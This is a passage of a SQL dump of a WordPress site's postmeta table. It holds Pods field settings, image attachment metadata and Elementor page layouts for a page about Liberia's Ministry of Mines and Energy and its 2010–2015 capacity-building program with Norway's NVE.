x999'),(17304,2570,'phone_enable_phone_extension','1'),(17305,2570,'phone_max_length','25'),(17306,2570,'phone_html5','0'),(17307,2570,'email_max_length','255'),(17308,2570,'email_html5','0'),(17309,2570,'password_max_length','255'),(17310,2570,'paragraph_allow_html','1'),(17311,2570,'paragraph_oembed','0'),(17312,2570,'paragraph_wptexturize','1'),(17313,2570,'paragraph_convert_chars','1'),(17314,2570,'paragraph_wpautop','1'),(17315,2570,'paragraph_allow_shortcode','0'),(17316,2570,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(17317,2570,'paragraph_max_length','0'),(17318,2570,'wysiwyg_editor','tinymce'),(17319,2570,'wysiwyg_media_buttons','1'),(17320,2570,'wysiwyg_oembed','0'),(17321,2570,'wysiwyg_wptexturize','1'),(17322,2570,'wysiwyg_convert_chars','1'),(17323,2570,'wysiwyg_wpautop','1'),(17324,2570,'wysiwyg_allow_shortcode','0'),(17325,2570,'code_allow_shortcode','0'),(17326,2570,'code_max_length','0'),(17327,2570,'datetime_type','format'),(17328,2570,'datetime_format','mdy'),(17329,2570,'datetime_time_type','12'),(17330,2570,'datetime_time_format','h_mma'),(17331,2570,'datetime_time_format_24','hh_mm'),(17332,2570,'datetime_allow_empty','1'),(17333,2570,'datetime_html5','0'),(17334,2570,'date_type','format'),(17335,2570,'date_format','mdy'),(17336,2570,'date_allow_empty','1'),(17337,2570,'date_html5','0'),(17338,2570,'time_type','12'),(17339,2570,'time_format','h_mma'),(17340,2570,'time_format_24','hh_mm'),(17341,2570,'time_allow_empty','1'),(17342,2570,'time_html5','0'),(17343,2570,'number_format_type','number'),(17344,2570,'number_format','i18n'),(17345,2570,'number_decimals','0'),(17346,2570,'number_format_soft','0'),(17347,2570,'number_step','1'),(17348,2570,'number_min','0'),(17349,2570,'number_max','100'),(17350,2570,'number_max_length','12'),(17351,2570,'currency_format_type','number'),(17352,2570,'currency_format_sign','usd'),(17353,2570,'currency_format_placement','before'),(17354,2570,'currency_format','i18n'),(17355,2570,'currency_decimals','2'),(17356,2570,'currency_decimal_handling','none'),(17357,2570,'currency_step','1'),(17358,2570,'currency_min','0'),(17359,2570,'currency_max','1000'),(17360,2570,'currency_max_length','12'),(17361,2570,'file_format_type','single'),(17362,2570,'file_uploader','attachment'),(17363,2570,'file_attachment_tab','upload'),(17364,2570,'file_edit_title','1'),(17365,2570,'file_show_edit_link','0'),(17366,2570,'file_linked','0'),(17367,2570,'file_limit','0'),(17368,2570,'file_restrict_filesize','10MB'),(17369,2570,'file_type','images'),(17370,2570,'file_field_template','rows'),(17371,2570,'file_add_button','Add File'),(17372,2570,'file_modal_title','Attach a file'),(17373,2570,'file_modal_add_button','Add File'),(17374,2570,'file_wp_gallery_output','0'),(17375,2570,'file_wp_gallery_link','post'),(17376,2570,'file_wp_gallery_columns','1'),(17377,2570,'file_wp_gallery_random_sort','0'),(17378,2570,'file_wp_gallery_size','thumbnail'),(17379,2570,'oembed_width','0'),(17380,2570,'oembed_height','0'),(17381,2570,'oembed_show_preview','0'),(17382,2570,'oembed_restrict_providers','0'),(17383,2570,'oembed_enabled_providers_amazoncn','0'),(17384,2570,'oembed_enabled_providers_amazoncouk','0'),(17385,2570,'oembed_enabled_providers_amazoncom','0'),(17386,2570,'oembed_enabled_providers_amazoncomau','0'),(17387,2570,'oembed_enabled_providers_amazonin','0'),(17388,2570,'oembed_enabled_providers_animotocom','0'),(17389,2570,'oembed_enabled_providers_cloudupcom','0'),(17390,2570,'oembed_enabled_providers_collegehumorcom','0'),(17391,2570,'oembed_enabled_providers_crowdsignalcom','0'),(17392,2570,'oembed_enabled_providers_dailymotioncom','0'),(17393,2570,'oembed_enabled_providers_facebookcom','0'),(17394,2570,'oembed_enabled_providers_flickrcom','0'),(17395,2570,'oembed_enabled_providers_gfycatcom','0'),(17396,2570,'oembed_enabled_providers_hulucom','0'),(17397,2570,'oembed_enabled_providers_icloudcom','0'),(17398,2570,'oembed_enabled_providers_imgurcom','0'),(17399,2570,'oembed_enabled_providers_instagramcom','0'),(17400,2570,'oembed_enabled_providers_issuucom','0'),(17401,2570,'oembed_enabled_providers_kickstartercom','0'),(17402,2570,'oembed_enabled_providers_mesh','0'),(17403,2570,'oembed_enabled_providers_meetupcom','0'),(17404,2570,'oembed_enabled_providers_mixcloudcom','0'),(17405,2570,'oembed_enabled_providers_redditcom','0'),(17406,2570,'oembed_enabled_providers_reverbnationcom','0'),(17407,2570,'oembed_enabled_providers_screencastcom','0'),(17408,2570,'oembed_enabled_providers_scribdcom','0'),(17409,2570,'oembed_enabled_providers_sketchfabcom','0'),(17410,2570,'oembed_enabled_providers_slidesharenet','0'),(17411,2570,'oembed_enabled_providers_smugmugcom','0'),(17412,2570,'oembed_enabled_providers_someecardscom','0'),(17413,2570,'oembed_enabled_providers_songlink','0'),(17414,2570,'oembed_enabled_providers_soundcloudcom','0'),(17415,2570,'oembed_enabled_providers_speakerdeckcom','0'),(17416,2570,'oembed_enabled_providers_spotifycom','0'),(17417,2570,'oembed_enabled_providers_tedcom','0'),(17418,2570,'oembed_enabled_providers_tumblrcom','0'),(17419,2570,'oembed_enabled_providers_twittercom','0'),(17420,2570,'oembed_enabled_providers_vimeocom','0'),(17421,2570,'oembed_enabled_providers_wistiacom','0'),(17422,2570,'oembed_enabled_providers_wordpresscom','0'),(17423,2570,'oembed_enabled_providers_wordpresstv','0'),(17424,2570,'oembed_enabled_providers_youtubecom','0'),(17425,2570,'pick_format_type','single'),(17426,2570,'pick_format_single','dropdown'),(17427,2570,'pick_format_multi','checkbox'),(17428,2570,'pick_allow_add_new','1'),(17429,2570,'pick_taggable','0'),(17430,2570,'pick_show_icon','1'),(17431,2570,'pick_show_edit_link','1'),(17432,2570,'pick_show_view_link','1'),(17433,2570,'pick_limit','0'),(17434,2570,'pick_user_role','a:0:{}'),(17435,2570,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(17436,2570,'boolean_format_type','checkbox'),(17437,2570,'boolean_yes_label','Yes'),(17438,2570,'boolean_no_label','No'),(17439,2570,'admin_only','0'),(17440,2570,'restrict_role','0'),(17441,2570,'restrict_capability','0'),(17442,2570,'hidden','0'),(17443,2570,'read_only','0'),(17444,2570,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(17445,2570,'rest_read','0'),(17446,2570,'rest_write','0'),(17447,2570,'rest_pick_response','array'),(17448,2570,'rest_pick_depth','2'),(17449,453,'wysiwyg_repeatable','0'),(17451,462,'pod_reference','a:1:{s:3:\"pod\";s:16:\"project_resource\";}'),(17453,2573,'_wp_attached_file','2019/11/featured_mme_project.jpg'),(17454,2573,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:32:\"2019/11/featured_mme_project.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"featured_mme_project-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"featured_mme_project-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"featured_mme_project-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D7100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1531484665\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(17455,2558,'_thumbnail_id','2573'),(17456,2558,'funder','The United National Development Programme'),(17457,2558,'partners',''),(17467,2575,'_elementor_edit_mode','builder'),(17468,2575,'_elementor_template_type','wp-post'),(17469,2575,'_elementor_version','2.7.5'),(17470,2575,'_wp_page_template','default'),(17471,2575,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17475,2576,'_elementor_edit_mode','builder'),(17476,2576,'_elementor_template_type','wp-post'),(17477,2576,'_elementor_version','2.7.5'),(17478,2576,'_wp_page_template','default'),(17479,2576,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17483,2577,'_elementor_edit_mode','builder'),(17484,2577,'_elementor_template_type','wp-post'),(17485,2577,'_elementor_version','2.7.5'),(17486,2577,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (17487,2577,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related 